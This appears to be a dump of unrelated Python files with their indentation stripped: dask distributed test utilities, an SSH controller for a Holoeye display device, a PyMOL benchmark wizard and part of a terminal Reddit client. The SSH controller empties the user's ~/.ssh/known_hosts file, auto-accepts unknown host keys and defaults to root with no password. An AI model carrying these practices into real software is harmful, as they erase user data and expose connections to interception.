proc = subprocess.Popen(args, **kwargs)
try:
yield proc
except Exception:
dump_stdout = True
raise
finally:
try:
terminate_process(proc)
finally:
# XXX Also dump stdout if return code != 0 ?
out, err = proc.communicate()
if dump_stdout:
print("\n\nPrint from stderr\n %s\n=================\n" % args[0][0])
print(err.decode())
print("\n\nPrint from stdout\n=================\n")
print(out.decode())
def wait_for_port(address, timeout=5):
assert isinstance(address, tuple)
deadline = time() + timeout
while True:
timeout = deadline - time()
if timeout < 0:
raise RuntimeError("Failed to connect to %s" % (address,))
try:
sock = socket.create_connection(address, timeout=timeout)
except EnvironmentError:
pass
else:
sock.close()
break
def wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail("condition not reached until %s seconds" % (timeout,))
async def async_wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
await asyncio.sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail("condition not reached until %s seconds" % (timeout,))
@memoize
def has_ipv6():
"""
Return whether IPv6 is locally functional. This doesn't guarantee IPv6
is properly configured outside of localhost.
"""
serv = cli = None
try:
serv = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
serv.bind(("::", 0))
serv.listen(5)
cli = socket.create_connection(serv.getsockname()[:2])
except EnvironmentError:
return False
else:
return True
finally:
if cli is not None:
cli.close()
if serv is not None:
serv.close()
if has_ipv6():
def requires_ipv6(test_func):
return test_func
else:
requires_ipv6 = pytest.mark.skip("ipv6 required")
async def assert_can_connect(addr, timeout=None, connection_args=None):
"""
Check that it is possible to connect to the distributed *addr*
within the given *timeout*.
"""
if timeout is None:
timeout = 0.5
comm = await connect(addr, timeout=timeout, connection_args=connection_args)
comm.abort()
async def assert_cannot_connect(
addr, timeout=None, connection_args=None, exception_class=EnvironmentError
):
"""
Check that it is impossible to connect to the distributed *addr*
within the given *timeout*.
"""
if timeout is None:
timeout = 0.5
with pytest.raises(exception_class):
comm = await connect(addr, timeout=timeout, connection_args=connection_args)
comm.abort()
async def assert_can_connect_from_everywhere_4_6(
port, timeout=None, connection_args=None, protocol="tcp"
):
"""
Check that the local *port* is reachable from all IPv4 and IPv6 addresses.
"""
args = (timeout, connection_args)
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), *args),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), *args),
]
if has_ipv6():
futures += [
assert_can_connect("%s://[::1]:%d" % (protocol, port), *args),
assert_can_connect("%s://[%s]:%d" % (protocol, get_ipv6(), port), *args),
]
await asyncio.gather(*futures)
async def assert_can_connect_from_everywhere_4(
port, timeout=None, connection_args=None, protocol="tcp"
):
"""
Check that the local *port* is reachable from all IPv4 addresses.
"""
args = (timeout, connection_args)
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), *args),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), *args),
]
if has_ipv6():
futures += [
assert_cannot_connect("%s://[::1]:%d" % (protocol, port), *args),
assert_cannot_connect("%s://[%s]:%d" % (protocol, get_ipv6(), port), *args),
]
await asyncio.gather(*futures)
async def assert_can_connect_locally_4(port, timeout=None, connection_args=None):
"""
Check that the local *port* is only reachable from local IPv4 addresses.
"""
args = (timeout, connection_args)
futures = [assert_can_connect("tcp://127.0.0.1:%d" % port, *args)]
if get_ip() != "127.0.0.1": # No outside IPv4 connectivity?
futures += [assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), *args)]
if has_ipv6():
futures += [
assert_cannot_connect("tcp://[::1]:%d" % port, *args),
assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), *args),
]
await asyncio.gather(*futures)
async def assert_can_connect_from_everywhere_6(
port, timeout=None, connection_args=None
):
"""
Check that the local *port* is reachable from all IPv6 addresses.
"""
assert has_ipv6()
args = (timeout, connection_args)
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, *args),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), *args),
assert_can_connect("tcp://[::1]:%d" % port, *args),
assert_can_connect("tcp://[%s]:%d" % (get_ipv6(), port), *args),
]
await asyncio.gather(*futures)
async def assert_can_connect_locally_6(port, timeout=None, connection_args=None):
"""
Check that the local *port* is only reachable from local IPv6 addresses.
"""
assert has_ipv6()
args = (timeout, connection_args)
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, *args),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), *args),
assert_can_connect("tcp://[::1]:%d" % port, *args),
]
if get_ipv6() != "::1": # No outside IPv6 connectivity?
futures += [assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), *args)]
await asyncio.gather(*futures)
@contextmanager
def captured_logger(logger, level=logging.INFO, propagate=None):
"""Capture output from the given Logger.
"""
if isinstance(logger, str):
logger = logging.getLogger(logger)
orig_level = logger.level
orig_handlers = logger.handlers[:]
if propagate is not None:
orig_propagate = logger.propagate
logger.propagate = propagate
sio = io.StringIO()
logger.handlers[:] = [logging.StreamHandler(sio)]
logger.setLevel(level)
try:
yield sio
finally:
logger.handlers[:] = orig_handlers
logger.setLevel(orig_level)
if propagate is not None:
logger.propagate = orig_propagate
@contextmanager
def captured_handler(handler):
"""Capture output from the given logging.StreamHandler.
"""
assert isinstance(handler, logging.StreamHandler)
orig_stream = handler.stream
handler.stream = io.StringIO()
try:
yield handler.stream
finally:
handler.stream = orig_stream
@contextmanager
def new_config(new_config):
"""
Temporarily change configuration dictionary.
"""
from .config import defaults
config = dask.config.config
orig_config = copy.deepcopy(config)
try:
config.clear()
config.update(copy.deepcopy(defaults))
dask.config.update(config, new_config)
initialize_logging(config)
yield
finally:
config.clear()
config.update(orig_config)
initialize_logging(config)
@contextmanager
def new_environment(changes):
saved_environ = os.environ.copy()
os.environ.update(changes)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
@contextmanager
def new_config_file(c):
"""
Temporarily change configuration file to match dictionary *c*.
"""
import yaml
old_file = os.environ.get("DASK_CONFIG")
fd, path = tempfile.mkstemp(prefix="dask-config")
try:
with os.fdopen(fd, "w") as f:
f.write(yaml.dump(c))
os.environ["DASK_CONFIG"] = path
try:
yield
finally:
if old_file:
os.environ["DASK_CONFIG"] = old_file
else:
del os.environ["DASK_CONFIG"]
finally:
os.remove(path)
certs_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "tests"))
def get_cert(filename):
"""
Get the path to one of the test TLS certificates.
"""
path = os.path.join(certs_dir, filename)
assert os.path.exists(path), path
return path
def tls_config():
"""
A functional TLS configuration with our test certs.
"""
ca_file = get_cert("tls-ca-cert.pem")
keycert = get_cert("tls-key-cert.pem")
return {
"distributed": {
"comm": {
"tls": {
"ca-file": ca_file,
"client": {"cert": keycert},
"scheduler": {"cert": keycert},
"worker": {"cert": keycert},
}
}
}
}
def tls_only_config():
"""
A functional TLS configuration with our test certs, disallowing
plain TCP communications.
"""
c = tls_config()
c["distributed"]["comm"]["require-encryption"] = True
return c
def tls_security():
"""
A Security object with proper TLS configuration.
"""
with new_config(tls_config()):
sec = Security()
return sec
def tls_only_security():
"""
A Security object with proper TLS configuration and disallowing plain
TCP communications.
"""
with new_config(tls_only_config()):
sec = Security()
assert sec.require_encryption
return sec
def get_server_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def get_client_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def bump_rlimit(limit, desired):
resource = pytest.importorskip("resource")
try:
soft, hard = resource.getrlimit(limit)
if soft < desired:
resource.setrlimit(limit, (desired, max(hard, desired)))
except Exception as e:
pytest.skip("rlimit too low (%s) and can't be increased: %s" % (soft, e))
def gen_tls_cluster(**kwargs):
kwargs.setdefault("nthreads", [("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)])
return gen_cluster(
scheduler="tls://127.0.0.1", security=tls_only_security(), **kwargs
)
@contextmanager
def save_sys_modules():
old_modules = sys.modules
old_path = sys.path
try:
yield
finally:
for i, elem in enumerate(sys.path):
if elem not in old_path:
del sys.path[i]
for elem in sys.modules.keys():
if elem not in old_modules:
del sys.modules[elem]
@contextmanager
def check_thread_leak():
active_threads_start = set(threading._active)
yield
start = time()
while True:
bad = [
t
for t, v in threading._active.items()
if t not in active_threads_start
and "Threaded" not in v.name
and "watch message" not in v.name
and "TCP-Executor" not in v.name
]
if not bad:
break
else:
sleep(0.01)
if time() > start + 5:
from distributed import profile
tid = bad[0]
thread = threading._active[tid]
call_stacks = profile.call_stack(sys._current_frames()[tid])
assert False, (thread, call_stacks)
@contextmanager
def check_process_leak(check=True):
for proc in mp_context.active_children():
proc.terminate()
yield
if check:
for i in range(100):
if not set(mp_context.active_children()):
break
else:
sleep(0.2)
else:
assert not mp_context.active_children()
_cleanup_dangling()
for proc in mp_context.active_children():
proc.terminate()
@contextmanager
def check_instances():
Client._instances.clear()
Worker._instances.clear()
Scheduler._instances.clear()
SpecCluster._instances.clear()
# assert all(n.status == "closed" for n in Nanny._instances), {
# n: n.status for n in Nanny._instances
# }
Nanny._instances.clear()
_global_clients.clear()
Comm._instances.clear()
yield
start = time()
while set(_global_clients):
sleep(0.1)
assert time() < start + 10
_global_clients.clear()
for w in Worker._instances:
with ignoring(RuntimeError): # closed IOLoop
w.loop.add_callback(w.close, report=False, executor_wait=False)
if w.status == "running":
w.loop.add_callback(w.close)
Worker._instances.clear()
for i in range(5):
if all(c.closed() for c in Comm._instances):
break
else:
sleep(0.1)
else:
L = [c for c in Comm._instances if not c.closed()]
Comm._instances.clear()
print("Unclosed Comms", L)
# raise ValueError("Unclosed Comms", L)
assert all(n.status == "closed" or n.status == "init" for n in Nanny._instances), {
n: n.status for n in Nanny._instances
}
# assert not list(SpecCluster._instances) # TODO
assert all(c.status == "closed" for c in SpecCluster._instances)
SpecCluster._instances.clear()
Nanny._instances.clear()
DequeHandler.clear_all_instances()
@contextmanager
def clean(threads=not WINDOWS, instances=True, timeout=1, processes=True):
@contextmanager
def null():
yield
with check_thread_leak() if threads else null():
with pristine_loop() as loop:
with check_process_leak(check=processes):
with check_instances() if instances else null():
with check_active_rpc(loop, timeout):
reset_config()
dask.config.set({"distributed.comm.timeouts.connect": "5s"})
# Restore default logging levels
# XXX use pytest hooks/fixtures instead?
for name, level in logging_levels.items():
logging.getLogger(name).setLevel(level)
yield loop
with ignoring(AttributeError):
del thread_state.on_event_loop_thread
@pytest.fixture
def cleanup():
with check_thread_leak():
with check_process_leak():
with check_instances():
reset_config()
dask.config.set({"distributed.comm.timeouts.connect": "5s"})
for name, level in logging_levels.items():
logging.getLogger(name).setLevel(level)
yield
|
__init__.py
|
import threading
import numpy as np
import imageio
import os
import paramiko
from paramiko import SSHClient
from scp import SCPClient
class HoloeyeSLM (SSHClient):
class Commands:
PWD = 'pwd'
GO_HOME = "cd ~"
SET_LIBRARY = "export LD_LIBRARY_PATH=/mnt"
DISABLE_HDMI = "/mnt/ControlExmpl -a"
SHOW_IMAGE = "/mnt/ControlExmpl -o ~/tmp.bmp"
CHANGE_IP = "ifconfig usb0 {0} {1}"
invalid_input_err = "INVALID input: the size of input image/array must be({0},{1}) and the indices/pixels values must be a number between ({2},{3})"
CACHE_PATH = "./cache"
'''
Initializes and establishes the connection to the device
'''
def flush_RSA_Keys(self):
if self.RSA_Keys is None:
# try the user's .ssh key file, and mask exceptions
self.RSA_Keys = os.path.expanduser("~/.ssh/known_hosts")
try:
fb = open(self.RSA_Keys,'wb')
fb.write(b'')
fb.close()
except IOError:
pass
def __init__(self, host='10.10.70.1', port=22, username='root', password='', width=1920, height=1080, min=0, max=255, logging=False,RSA_Keys=None):
self.logging = logging
self.RSA_Keys = RSA_Keys
if(not os.path.exists(self.CACHE_PATH)):
os.mkdir(self.CACHE_PATH)
self.width = width
self.height = height
self.min = min
self.max = max
self.invalid_array_err = self.invalid_input_err.format(
height, width, min, max)
self.hostname = host
self.port = port
self.username = username
self.password = password
self.prepare_connect()
def prepare_connect(self):
self.flush_RSA_Keys()
super().__init__()
self.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.connect()
self.channel = self.invoke_shell()
self._go_home()
self._set_library_path()
self.diconnectHDMI()
self.logger = threading.Thread(target=self.__log,daemon=True,name='HoloeyeSLM {0} Logger'.format(self.hostname))
self.logger.start()
def __log(self):
while (self.logging):
print("Holoeye SLM Log.:. \n")
while not self.channel.recv_ready():
pass
out = self.channel.recv(9999)
print(out)
'''
gets the current session directory
'''
def _pwd(self):
stdin, stdout, stderr = self.exec_command(self.Commands.PWD)
lines = stdout.readlines()
return lines
'''
Setups the current session directory to home
'''
def _go_home(self):
self.channel.send(self.Commands.GO_HOME+'\n')
# while not self.channel.recv_ready():
# pass
# out = self.channel.recv(9999)
# print(out.decode())
'''
Setups the libraries path in SLM
'''
def _set_library_path(self):
self.channel.send(self.Commands.SET_LIBRARY+'\n')
# while not self.channel.recv_ready():
# pass
# out = self.channel.recv(9999)
# print(out.decode())
'''
Runs the show command on slm
'''
def _show_image(self):
self.channel.send(self.Commands.SHOW_IMAGE+'\n')
# while not self.channel.recv_ready():
# pass
# out = self.channel.recv(9999)
# print(out.decode())
'''
Validates the array whether it is a legitimate input.
'''
def _validateArray(self, array):
if (array.shape == (self.height, self.width)) and (array.max() <= self.max) and (array.min() >= self.min):
return array
raise Exception(self.invalid_input_err)
'''
Validates the input image path whether it is a legitimate input. And returns the array in case it's a correct format
'''
def _validateImage(self, path):
im = imageio.imread(path)
return self._validateArray(im)
'''Saves the image in the temporary path'''
def _saveImage(self, array):
try:
imageio.imwrite(self.CACHE_PATH+'/tmp.bmp', array)
except Exception as ex:
print(ex)
'''Removes the image in the temporary path'''
def _removeImage(self, array):
try:
if os.path.exists(self.CACHE_PATH+'/tmp.bmp'):
os.remove(self.CACHE_PATH+'/tmp.bmp')
except Exception as ex:
print(ex)
'''
Establishes connection to the Holoeyes SLM device
'''
def connect(self):
return super().connect(self.hostname, port=self.port, username=self.username, password=self.password)
'''
Disoconnects the HDMI from the HoloeyeSLM device
'''
def diconnectHDMI(self):
self.channel.send(self.Commands.DISABLE_HDMI+'\n')
# while not self.channel.recv_ready():
# pass
# out = self.channel.recv(9999)
# print(out.decode())
'''
Sends an image at a given path to HoloeyeSLM
'''
def sendImage(self, FILE_PATH):
try:
im = imageio.imread(FILE_PATH)
array = self._validateImage(FILE_PATH)
self._saveImage(array)
# TODO : SEND IMAGE TO HOME DIRECTORY
with SCPClient(self.get_transport()) as scp:
scp.put(self.CACHE_PATH+'/tmp.bmp',remote_path='~')
scp.close()
self._show_image()
# TODO : RUN SHOW COMMAND ON
# self._removeImage()
except Exception as ex:
raise ex
'''
Sends an nparray to HoloeyeSLM
'''
def sendData(self, data):
try:
array = self._validateArray(data)
self._saveImage(array)
# TODO : SEND IMAGE TO HOME DIRECTORY
with SCPClient(self.get_transport()) as scp:
scp.put(self.CACHE_PATH+'/tmp.bmp',remote_path='~')
scp.close()
self._show_image()
# TODO : RUN SHOW COMMAND ON
self._removeImage()
except Exception as ex:
raise ex
'''
Changes the current HoloeyeSLM IP address
'''
def changeIP(self, new_IP='10.10.70.2',mask='255.0.0.0'):
print(self.Commands.CHANGE_IP.format(new_IP,mask)+'\n')
self.channel.send(self.Commands.CHANGE_IP.format(new_IP,mask)+'\n')
self.hostname = new_IP
self.close()
|
benchmark.py
|
from __future__ import print_function
import threading
from pymol.wizard import Wizard
from pymol import cmd
import pymol
import types
import time
class Benchmark(Wizard):
def bench_fn(self,action):
time.sleep(0.5)
self.cmd.do("_ wizard benchmark,%s"%action)
def report(self,name,value):
ver = self.cmd.get_version()[0]
print("PyMOL %s benchmark: %30s = %10.5f"%(ver,name,value))
def launch(self,name):
return None
def configure(self):
self.cmd.reinitialize()
def __init__(self,arg0=None,_self=cmd):
Wizard.__init__(self,_self)
self.gl = 5.0
self.short_cpu = 8.0
self.long_cpu = 16.0
self.message = []
if arg0!=None:
if hasattr(self,arg0):
getattr(self,arg0)()
def reset(self):
pass
def run_all(self):
self.run_gl()
self.run_cpu()
def run_cpu(self):
self.surface_calculation()
self.configure()
self.mesh_calculation()
self.configure()
self.ray_trace1()
self.configure()
def run_gl(self):
self.configure()
self.updates()
self.configure()
self.smooth_lines()
self.configure()
self.jagged_lines()
self.configure()
self.dots()
self.configure()
self.sticks()
self.configure()
self.surface()
self.configure()
self.spheres()
self.configure()
self.cartoon()
self.configure()
self.blits()
self.configure()
def updates(self):
self.cmd.fragment("methane")
self.cmd.set("antialias",0)
cnt = 0
elapsed = 0.0
self.cmd.refresh()
self.cmd.meter_reset()
start = time.time()
while elapsed<self.gl:
self.cmd.turn("x",1)
self.cmd.turn("y",1)
self.cmd.refresh()
cnt = cnt + 1
elapsed = time.time()-start
self.report('UPDATES_V1',(cnt/elapsed)/100)
def smooth_lines(self):
self.cmd.load("$PYMOL_DATA/demo/1tii.pdb")
self.cmd.show("mesh")
self.cmd.zoom(complete=1)
elapsed = 0.0
cnt = 0
self.cmd.refresh()
self.cmd.meter_reset()
start = time.time()
while elapsed<self.gl:
self.cmd.turn("x",15)
self.cmd.turn("y",15)
self.cmd.refresh()
cnt = cnt + 1
elapsed = time.time()-start
self.report('SMOOTH_LINES_V1',cnt/elapsed)
def jagged_lines(self):
self.cmd.load("$PYMOL_DATA/demo/1tii.pdb")
self.cmd.show("mesh")
self.cmd.set("line_smooth",0)
self.cmd.zoom(complete=1)
cnt = 0
elapsed = 0.0
self.cmd.refresh()
self.cmd.meter_reset()
start = time.time()
while elapsed<self.gl:
self.cmd.turn("x",15)
self.cmd.turn("y",15)
self.cmd.refresh()
cnt = cnt + 1
elapsed = time.time()-start
self.report('JAGGED_LINES_V1',cnt/elapsed)
def dots(self):
self.cmd.load("$PYMOL_DATA/demo/1tii.pdb")
self.cmd.hide()
self.cmd.show("dots")
self.cmd.zoom(complete=1)
elapsed = 0.0
cnt = 0
self.cmd.refresh()
self.cmd.meter_reset()
start = time.time()
while elapsed<self.gl:
self.cmd.turn("x",15)
self.cmd.turn("y",15)
self.cmd.refresh()
cnt = cnt + 1
elapsed = time.time()-start
self.report('DOTS_V1',cnt/elapsed)
def sticks(self):
self.cmd.load("$PYMOL_DATA/demo/1tii.pdb")
self.cmd.hide()
self.cmd.show("sticks")
self.cmd.zoom(complete=1)
cnt = 0
elapsed = 0.0
self.cmd.refresh()
self.cmd.meter_reset()
start = time.time()
while elapsed<self.gl:
self.cmd.turn("x",15)
self.cmd.turn("y",15)
self.cmd.refresh()
cnt = cnt + 1
elapsed = time.time()-start
self.report('STICKS_V1',cnt/elapsed)
def surface(self):
self.cmd.load("$PYMOL_DATA/demo/1tii.pdb")
self.cmd.hide()
self.cmd.show("surface")
self.cmd.zoom(complete=1)
cnt = 0
elapsed = 0.0
self.cmd.refresh()
self.cmd.meter_reset()
start = time.time()
while elapsed<self.gl:
self.cmd.turn("x",15)
self.cmd.turn("y",15)
self.cmd.refresh()
cnt = cnt + 1
elapsed = time.time()-start
self.report('SURFACE_V1',cnt/elapsed)
def spheres(self):
self.cmd.load("$PYMOL_DATA/demo/1tii.pdb")
self.cmd.hide()
self.cmd.show("spheres")
self.cmd.zoom(complete=1)
cnt = 0
elapsed = 0.0
self.cmd.refresh()
self.cmd.meter_reset()
start = time.time()
while elapsed<self.gl:
self.cmd.turn("x",15)
self.cmd.turn("y",15)
self.cmd.refresh()
cnt = cnt + 1
elapsed = time.time()-start
self.report('SPHERES_V1',cnt/elapsed)
def cartoon(self):
self.cmd.load("$PYMOL_DATA/demo/1tii.pdb")
self.cmd.hide()
self.cmd.show("cartoon")
self.cmd.spectrum("count",selection="name ca")
self.cmd.zoom(complete=1)
cnt = 0
elapsed = 0.0
self.cmd.refresh()
self.cmd.meter_reset()
start = time.time()
while elapsed<self.gl:
self.cmd.turn("x",15)
self.cmd.turn("y",15)
self.cmd.refresh()
cnt = cnt + 1
elapsed = time.time()-start
self.report('CARTOON_V1',cnt/elapsed)
def blits(self):
self.cmd.load("$PYMOL_DATA/demo/pept.pdb")
self.cmd.mset("1 x2")
self.cmd.set('cache_frames',1)
self.cmd.rewind()
self.cmd.refresh()
self.cmd.turn('x',5)
self.cmd.forward()
self.cmd.refresh()
cnt = 0
elapsed = 0.0
self.cmd.refresh()
self.cmd.meter_reset()
start = time.time()
while elapsed<self.gl:
self.cmd.frame(1)
self.cmd.refresh()
self.cmd.frame(2)
self.cmd.refresh()
cnt = cnt + 1
elapsed = time.time()-start
self.report('BLITS_V1',2*cnt/elapsed)
def surface_calculation(self):
self.cmd.load("$PYMOL_DATA/demo/il2.pdb")
self.cmd.zoom(complete=1)
self.cmd.hide()
self.cmd.show("surface")
self.cmd.clip("slab",0)
cnt = 0
elapsed = 0.0
self.cmd.refresh()
start = time.time()
while (elapsed)<self.short_cpu:
self.cmd.rebuild()
self.cmd.refresh()
cnt = cnt + 1
elapsed = time.time()-start
self.report('SURFACE_CALCULATION_V1',60*cnt/elapsed)
def mesh_calculation(self):
self.cmd.load("$PYMOL_DATA/demo/il2.pdb")
self.cmd.zoom(complete=1)
self.cmd.hide()
self.cmd.show("mesh")
self.cmd.clip("slab",0)
cnt = 0
elapsed = 0.0
self.cmd.refresh()
start = time.time()
while (elapsed)<self.short_cpu:
self.cmd.rebuild()
self.cmd.refresh()
cnt = cnt + 1
elapsed = time.time()-start
self.report('MESH_CALCULATION_V1',60*cnt/elapsed)
def ray_trace0(self): # Interactive benchmark
self.configure()
self.ray_tracing([
[2,90],
])
def ray_trace1(self): # Standard benchmark
self.configure()
self.ray_tracing([
[1,90],
[2,90],
[4,90],
[8,90],
[1,120],
[2,120],
[1,160],
[2,160],
[1,200],
[2,200],
])
def ray_trace2(self): # Heavy-duty SMP workout
self.configure()
self.ray_tracing([
[1,200],
[2,200],
[3,200],
[4,200],
[5,200],
[6,200],
[7,200],
[8,200],
[9,200],
[10,200],
[11,200],
[12,200],
],width=3600,height=2700)
def ray_tracing(self,conditions,width=640,height=480):
self.cmd.load("$PYMOL_DATA/demo/1tii.pdb")
self.cmd.zoom(complete=1)
self.cmd.hide()
self.cmd.show("spheres","11-15/")
self.cmd.show("surface","21-25/")
self.cmd.show("mesh","A/10-20/")
self.cmd.show("sticks","41-50/")
self.cmd.show("lines","51-55/")
self.cmd.show("dots","61-65/")
self.cmd.show("cartoon","80-90/")
self.cmd.turn('x',25)
self.cmd.turn('y',25)
for cond in conditions:
(max_threads,hash_max) = cond
self.cmd.set('max_threads',max_threads)
self.cmd.set('hash_max',hash_max)
cnt = 0
elapsed = 0.0
self.cmd.refresh()
start = time.time()
while elapsed<self.long_cpu:
self.cmd.ray(width,height,quiet=1)
cnt = cnt + 1
elapsed = time.time()-start
self.report('RAY_V2_PX%d_TH%02d_HSH%03d'%(width*height,
max_threads,hash_max),60*cnt/elapsed)
def get_prompt(self):
self.prompt = self.message
return self.prompt
def delay_launch(self,action):
self.configure()
self.cmd.viewport(640,480)
self.cmd.feedback("disable","all","everything")
self.cmd.feedback("enable","python","output")
t = threading.Thread(target=self.bench_fn,args=(action,))
t.setDaemon(1)
t.start()
def get_panel(self):
return [
[ 1, 'Benchmarks', '' ],
[ 2, 'Run All', 'cmd.get_wizard().delay_launch("run_all")' ],
[ 2, 'Run GL', 'cmd.get_wizard().delay_launch("run_gl")' ],
[ 2, 'Run CPU', 'cmd.get_wizard().delay_launch("run_cpu")' ],
[ 2, 'Updates', 'cmd.get_wizard().delay_launch("updates")'],
[ 2, 'Smooth Lines', 'cmd.get_wizard().delay_launch("smooth_lines")'],
[ 2, 'Jagged Lines', 'cmd.get_wizard().delay_launch("jagged_lines")'],
[ 2, 'Dots', 'cmd.get_wizard().delay_launch("dots")'],
[ 2, 'Sticks', 'cmd.get_wizard().delay_launch("sticks")'],
[ 2, 'Surface', 'cmd.get_wizard().delay_launch("surface")'],
[ 2, 'Spheres', 'cmd.get_wizard().delay_launch("spheres")'],
[ 2, 'Cartoon', 'cmd.get_wizard().delay_launch("cartoon")'],
[ 2, 'Blits', 'cmd.get_wizard().delay_launch("blits")'],
[ 2, 'Surface Calculation', 'cmd.get_wizard().delay_launch("surface_calculation")'],
[ 2, 'Mesh Calculation', 'cmd.get_wizard().delay_launch("mesh_calculation")'],
[ 2, 'Ray Tracing', 'cmd.get_wizard().delay_launch("ray_trace0")'],
[ 2, 'End Demonstration', 'cmd.set_wizard()' ]
]
|
terminal.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
import re
import sys
import time
import shlex
import codecs
import curses
import logging
import threading
import webbrowser
import subprocess
import curses.ascii
from curses import textpad
from multiprocessing import Process
from contextlib import contextmanager
from tempfile import NamedTemporaryFile
import six
from kitchen.text.display import textual_width_chop
from . import exceptions, mime_parsers, content
from .docs import TOKEN
from .theme import Theme, ThemeList
from .objects import LoadScreen
try:
# Fix only needed for versions prior to python 3.6
from mailcap_fix import mailcap
except ImportError:
import mailcap
try:
# Added in python 3.4+
from html import unescape
except ImportError:
from six.moves import html_parser
unescape = html_parser.HTMLParser().unescape
if sys.version_info[0:2] == (3, 8) and sys.platform == 'darwin':
from multiprocessing import set_start_method
set_start_method('fork')
_logger = logging.getLogger(__name__)
class Terminal(object):
MIN_HEIGHT = 10
MIN_WIDTH = 20
# ASCII codes
ESCAPE = 27
RETURN = 10
SPACE = 32
def __init__(self, stdscr, config):
self.stdscr = stdscr
self.config = config
self.loader = LoadScreen(self)
self.theme = None # Initialized by term.set_theme()
self.theme_list = ThemeList()
self._display = None
self._mailcap_dict = mailcap.getcaps()
self._term = os.environ.get('TERM')
# This is a hack, the MIME parsers should be stateless
# but we need to load the imgur credentials from the config
mime_parsers.ImgurApiMIMEParser.CLIENT_ID = config['imgur_client_id']
@property
def up_arrow(self):
return '^' if self.config['ascii'] else '▲'
@property
def down_arrow(self):
return 'v' if self.config['ascii'] else '▼'
@property
def neutral_arrow(self):
return 'o' if self.config['ascii'] else '•'
@property
def gilded(self):
return '*' if self.config['ascii'] else '✪'
@property
def vline(self):
return getattr(curses, 'ACS_VLINE', ord('|'))
@property
def display(self):
"""
Use a number of methods to guess if the default webbrowser will open in
the background as opposed to opening directly in the terminal.
"""
if self._display is None:
if sys.platform == 'darwin':
# OS X won't set $DISPLAY unless xQuartz is installed.
# If you're using OS X and you want to access a terminal
# browser, you need to set it manually via $BROWSER.
# See issue #166
display = True
else:
display = bool(os.environ.get("DISPLAY"))
# Use the convention defined here to parse $BROWSER
# https://docs.python.org/2/library/webbrowser.html
console_browsers = ['www-browser', 'links', 'links2', 'elinks',
'lynx', 'w3m']
if "BROWSER" in os.environ:
user_browser = os.environ["BROWSER"].split(os.pathsep)[0]
if user_browser in console_browsers:
display = False
if webbrowser._tryorder:
if webbrowser._tryorder[0] in console_browsers:
display = False
self._display = display
return self._display
def flash(self):
"""
Flash the screen to indicate that an action was invalid.
"""
if self.config['flash']:
return curses.flash()
else:
return None
@staticmethod
def curs_set(val):
"""
Change the cursor visibility, may fail for some terminals with limited
cursor support.
"""
try:
curses.curs_set(val)
except:
pass
@staticmethod
def addch(window, y, x, ch, attr):
"""
Curses addch() method that fixes a major bug in python 3.4.
See http://bugs.python.org/issue21088
"""
if sys.version_info[:3] == (3, 4, 0):
y, x = x, y
window.addch(y, x, ch, attr)
def getch(self):
"""
Wait for a keypress and return the corresponding character code (int).
"""
return self.stdscr.getch()
@staticmethod
@contextmanager
def suspend():
"""
Suspend curses in order to open another subprocess in the terminal.
"""
try:
curses.endwin()
yield
finally:
curses.doupdate()
@contextmanager
def no_delay(self):
"""
Temporarily turn off character delay mode. In this mode, getch will not
block while waiting for input and will return -1 if no key has been
pressed.
"""
try:
self.stdscr.nodelay(1)
yield
finally:
self.stdscr.nodelay(0)
def get_arrow(self, likes):
"""
Curses does define constants for symbols (e.g. curses.ACS_BULLET).
However, they rely on using the curses.addch() function, which has been
found to be buggy and a general PITA to work with. By defining them as
unicode points they can be added via the more reliable curses.addstr().
http://bugs.python.org/issue21088
"""
if likes is None:
return self.neutral_arrow, self.attr('NeutralVote')
elif likes:
return self.up_arrow, self.attr('Upvote')
else:
return self.down_arrow, self.attr('Downvote')
def clean(self, string, n_cols=None):
"""
Required reading!
http://nedbatchelder.com/text/unipain.html
Python 2 input string will be a unicode type (unicode code points).
Curses will accept unicode if all of the points are in the ascii range.
However, if any of the code points are not valid ascii curses will
throw a UnicodeEncodeError: 'ascii' codec can't encode character,
ordinal not in range(128). If we encode the unicode to a utf-8 byte
string and pass that to curses, it will render correctly.
Python 3 input string will be a string type (unicode code points).
Curses will accept that in all cases. However, the n character count in
addnstr will not be correct. If code points are passed to addnstr,
curses will treat each code point as one character and will not account
for wide characters. If utf-8 is passed in, addnstr will treat each
'byte' as a single character.
Reddit's api sometimes chokes and double-encodes some html characters
Praw handles the initial decoding, but we need to do a second pass
just to make sure. See https://github.com/tildeclub/ttrv/issues/96
Example:
&amp; -> returned directly from reddit's api
& -> returned after PRAW decodes the html characters
& -> returned after our second pass, this is the true value
"""
if n_cols is not None and n_cols <= 0:
return ''
if isinstance(string, six.text_type):
string = unescape(string)
if self.config['ascii']:
if isinstance(string, six.binary_type):
